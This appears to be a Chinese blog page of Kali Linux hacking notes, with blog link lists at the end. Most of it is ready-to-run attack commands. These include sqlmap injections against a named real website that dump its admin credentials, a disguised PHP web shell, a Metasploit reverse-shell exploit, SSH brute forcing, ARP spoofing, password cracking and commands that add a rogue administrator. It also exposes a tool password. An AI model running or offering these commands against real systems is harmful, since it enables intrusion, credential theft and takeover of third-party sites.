kali linux ssh登陆:

一、配置SSH参数

修改sshd_config文件,命令为:

vi /etc/ssh/sshd_config

将#PasswordAuthentication no的注释去掉,并且将NO修改为YES //kali中默认是yes

将PermitRootLogin without-password修改为

PermitRootLogin yes

service ssh start

root@kali:~#apt-get install <软件名> //安装新软件
root@kali:~#apt-get remove <软件名> //卸载软件

medusa -h 10.10.5.246 -u root -P pass.txt -M ssh

crunch 1 3 -o aa.txt
locate wordlist
searchsploit openssl
/usr/share/sqlmap/txt/wordlist.zip

58 sqlmap -u http://www.cowinbio.com/about/index.php?id=1 --dbs --current-user
59 sqlmap -u http://www.cowinbio.com/about/index.php?id=1 --dbms mysql -D cw --tables
60 sqlmap -u http://www.cowinbio.com/about/index.php?id=1 --dbms mysql -D cw -T admin --columns
61 sqlmap -u http://www.cowinbio.com/about/index.php?id=1 --dbms mysql -T admin -C user,pwd --dump
sqlmap -u http://www.cowinbio.com/about/index.php --cookie id=1 --table --level 2
sqlmap -u http://www.cowinbio.com/about/index.php?id=1 --dbms mysql --tamper tamper/charunicodeencode.py -v 3
sqlmap -g inurl:php?id=
--post登录框注入
sqlmap -r search-test.txt -p tfUPass
sqlmap -u http://www.cowinbio.com/login.asp --forms
sqlmap -u http://www.cowinbio.com/login.asp --data "tfUName=1&tfUPass"
sqlmap 请求延时:
sqlmap -u http://www.cowinbio.com/login.asp --delay 1
sqlmap -u http://www.cowinbio.com/login.asp --safe-freq 3
绕过WAF防火墙:
nikto -host http://www.cowinbio.com/about/index.php?id=1 查找后台
https://www.exploit-db.com/google-hacking-database/ google-hacking-database
setoolkit set社会工程学攻击

openvas user:admin passwd:82207a15-be87-4ef7-a171-dbde81ef9ae9 https://127.0.0.1:9392
nessus service nessusd start https://127.0.0.1:8834
GIF89a
<? @system($_GET["cmd"]); ?>
www.fleurlis.com.tw

http://www.wooyun.org/bugs/wooyun-2016-0224790/trace/94cba88d12cef35cdeb898f26d4bdda9

root@kali:~# msfconsole -x "use exploit/multi/samba/usermap_script;\
set RHOST 172.16.194.172;\
set PAYLOAD cmd/unix/reverse;\
set LHOST 172.16.194.163;\
run"

hashcat -m 1800 -a 0 -o cra.txt shadow /usr/share/sqlmap/txt/wordlist.txt 密码破解

比如设置 --custom-charset1=?l?d 那么就表示 ?1代表小写字母与数字组合,那么8位随机的数字与小写字母组合可以写成 ?1?1?1?1?1?1?1?1,完整的例子:
hashcat test.txt -a 3 -m 0 --custom-charset1=?l?d ?1?1?1?1?1?1?1?1
再比如设置 --custom-charset2=xiao106347 那么就表示 ?2 代表字符串由 x i a o 1 0 6 3 4 7 组成的所有可能组合,完整例子:
hashcat test.txt -a 3 -m 0 --custom-charset2=xiao106347 ?2?2?2?2?2?2?2?2
hashcat -m 0 -a 3 -o ee1.txt test.hash --custom-charset1=xiao --custom-charset2=?d ?1?1?1?1?2?2?2?2

第一步,kali linux 2.0 本身已内置metasploit,kali 2.0 已经没有metasploit 这个服务了,所以service metasploit start 的方式不起作用。
在kali 2.0中启动带数据库支持的MSF方式如下:
#1 首先启动postgresql数据库:/etc/init.d/postgresql start;或者 service postgresql start;
#2 初始化MSF数据库(关键步骤!):msfdb init;
#3 运行msfconsole:msfconsole;
#4 在msf中查看数据库连接状态:db_status。
DONE
db_rebuild_cache

crunch字典密码生成
crunch 6 8 1234567890 -o w1.txt
crunch 10 10 -t @@@@@@@0728 -o w2.txt
crunch 8 8 -f /usr/share/rainbowcrack/charset.txt mixalpha -o w3.txt

ARP欺骗:
ettercap -i eth0 -Tq -M arp:remote /10.10.4.11//10.10.7.34/

cmd增加用户:
net user luozt luozt /add
net localgroup administrator luozt /add

ip转发:echo 1 > /proc/sys/net/ipv4/ip_forward

最新文章

  1. Markdown编辑器测试
  2. foreach为什么要实现IEnumerable接口而不是直接用IEnumerator接口
  3. ASP.NET MVC学习之过滤器篇(1)
  4. codeforces C. Diverse Permutation(构造)
  5. javascript设计模式学习之五——策略模式
  6. JavaScript常用检测脚本(正则表达式)
  7. linux内核编程笔记【原创】
  8. 编译busybox错误
  9. Scala中的构造器和高阶函数
  10. oracle闪回表详解
  11. Adobe Flash Platform产品介绍
  12. web dynpro message(备忘用)
  13. Tomcat 加入windows 服务自启动设置
  14. srping的历史与哲学
  15. input &amp; collapse &amp; tags
  16. Can&#39;t push you anymore...
  17. Breaking Down Type Erasure in Swift
  18. poj 1511 Invitation Cards(最短路中等题)
  19. Golang的交互模式进阶-读取用户的输入
  20. Swift - 多个mask的动画效果

热门文章

  1. Raspberry Pi开发之旅-发送邮件记录时间及IP
  2. TIJ读书笔记02-控制执行流程
  3. Django框架之自定义分页
  4. nodejs/REPL环境命令行操作命令
  5. MySQL备份账号权限
  6. Spring的AOP面向切面编程
  7. json数据与Gson工具类的使用
  8. wareshark网络协议分析之ARP
  9. sqoop1.4.6 全量导入与增量导入 与使用技巧
  10. codeforces675D Tree Construction